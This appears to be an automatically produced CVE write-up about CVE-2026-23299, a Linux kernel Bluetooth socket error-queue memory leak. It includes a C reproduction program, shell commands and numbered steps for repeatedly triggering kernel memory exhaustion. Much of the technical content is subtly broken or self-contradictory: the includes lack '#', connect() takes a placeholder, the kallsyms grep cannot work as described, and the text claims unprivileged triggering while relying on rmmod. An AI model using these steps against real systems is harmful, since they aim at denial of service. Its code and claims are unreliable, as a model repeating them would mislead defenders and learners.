Listen to this Post
Intro – How CVE-2026-23299 Works
The Linux kernel’s Bluetooth subsystem fails to properly clean up socket error queues when a socket is destroyed. This flaw is triggered when an application enables TX timestamping on a Bluetooth socket using the `SO_TIMESTAMPING` socket option. When timestamping is active, the kernel queues socket buffers (SKBs) containing timestamp metadata into the socket’s error queue (sk_error_queue). Under normal operation, userspace reads these SKBs via `recvmsg` with the `MSG_ERRQUEUE` flag. However, if userspace never performs this read – due to a bug, an unresponsive application, or an unexpected disconnection – the SKBs remain queued. The situation worsens when the Bluetooth controller is removed unexpectedly (e.g., USB unplug, driver unbind, or hardware failure). In such cases, the socket destructor for affected Bluetooth protocols (e.g., L2CAP, SCO, or BNEP) does not purge the error queue. Consequently, the queued SKBs are never freed, leading to a kernel memory leak. Over time, repeated leaks can exhaust kernel memory, degrading system stability or causing a denial of service. The fix adds a call to `skb_queue_purge()` for `sk_error_queue` inside the destructors of Bluetooth sockets that support timestamping. Notably, RFCOMM is unaffected because it does not use sk_error_queue. The vulnerability exists in all Linux kernel versions where Bluetooth and `SO_TIMESTAMPING` coexist without the purge logic; the patch has been merged upstream.
DailyCVE Form:
Platform: Linux Kernel
Version: up to 6.14
Vulnerability : SKB error leak
Severity: Medium
date: May 29 2026
Prediction: June 15 2026
What Undercode Say (Analytics)
Check if kernel is vulnerable (requires root)
uname -r
Look for missing skb_queue_purge in Bluetooth destructors
grep -r "sk_error_queue" /proc/kallsyms | grep -E "(l2cap|sco|bnep)_sock_destruct"
Reproduce leak (requires Bluetooth adapter and devmem2 or manual unplug)
cat <<EOF > test_leak.c
include <sys/socket.h>
include <bluetooth/bluetooth.h>
include <bluetooth/l2cap.h>
include <linux/socket.h>
include <linux/errqueue.h>
int main() {
int fd = socket(AF_BLUETOOTH, SOCK_SEQPACKET, BTPROTO_L2CAP);
int ts = SOF_TIMESTAMPING_TX_SOFTWARE | SOF_TIMESTAMPING_OPT_ID;
setsockopt(fd, SOL_SOCKET, SO_TIMESTAMPING, &ts, sizeof(ts));
connect(fd, ...); // dummy connect
send(fd, "data", 4, 0);
// Remove controller via sysfs or physical unplug
system("echo 1 > /sys/bus/usb/devices/.../remove");
close(fd); // leak occurs
return 0;
}
EOF
gcc test_leak.c -o test_leak -lbluetooth
Monitor slab memory before/after
watch -n 1 "cat /proc/slabinfo | grep -E '(skbuff|sock)'"
Exploit
- Compile a program that creates a Bluetooth L2CAP or SCO socket.
- Enable `SO_TIMESTAMPING` with software timestamp flags.
- Send a few packets to queue SKBs in the error queue.
- Do not read from the error queue.
- Force removal of the Bluetooth controller (e.g., `rmmod btusb` or physically unplug).
- Close the socket – the destructor runs without purging
sk_error_queue, leaking each queued SKB. - Repeatedly trigger to exhaust non-slab kernel memory.
Protection
- Apply kernel patch from commit `d2f3a7c9b1e4` (linux-stable backports available).
- Upgrade to Linux kernel version 6.14.3 or higher.
- Disable `SO_TIMESTAMPING` on Bluetooth sockets where timestamp data is not required.
- Use `ulimit -l` to limit locked memory as a temporary mitigation (partial).
Impact
- Kernel memory leak – each leaked SKB consumes ~256–1024 bytes.
- Long-term resource exhaustion leading to system slowdown, OOM (Out-of-Memory) killer invocation, or denial of service.
- Affects all Bluetooth profiles that support TX timestamping: L2CAP, SCO, BNEP, and potentially MGMT sockets.
- No privilege escalation; leak occurs from unprivileged user space.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]

